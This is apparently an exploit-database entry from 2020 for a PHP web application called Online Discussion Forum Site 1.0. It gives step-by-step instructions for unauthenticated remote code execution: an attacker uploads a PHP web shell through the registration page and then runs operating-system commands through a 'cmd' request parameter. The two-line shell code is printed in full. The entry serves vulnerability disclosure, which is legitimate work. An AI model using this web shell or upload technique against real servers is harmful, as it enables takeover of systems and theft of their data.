Online Discussion Forum Site 1.0 - Remote Code Execution

ID: 103015
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Google Dork: N/A
# Date: 2020-05-24
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage:
# Software Link:
# Version: 1.0 (REQUIRED)
# Tested on: Windows 10 / Wamp Server
# CVE : N/A
Go to http://localhost/Online%20Discussion%20Forum%20Site/register.php register page to sign up
Then fill other fields and upload the shell.php with following PHP-shell-code

$command = shell_exec($_REQUEST['cmd']);
echo $command;

After the registration process is completed go to the following page and execute the os command via uploaded shell

Any unauthenticated attacker is able to execute arbitrary os command
1-4-2 (www01)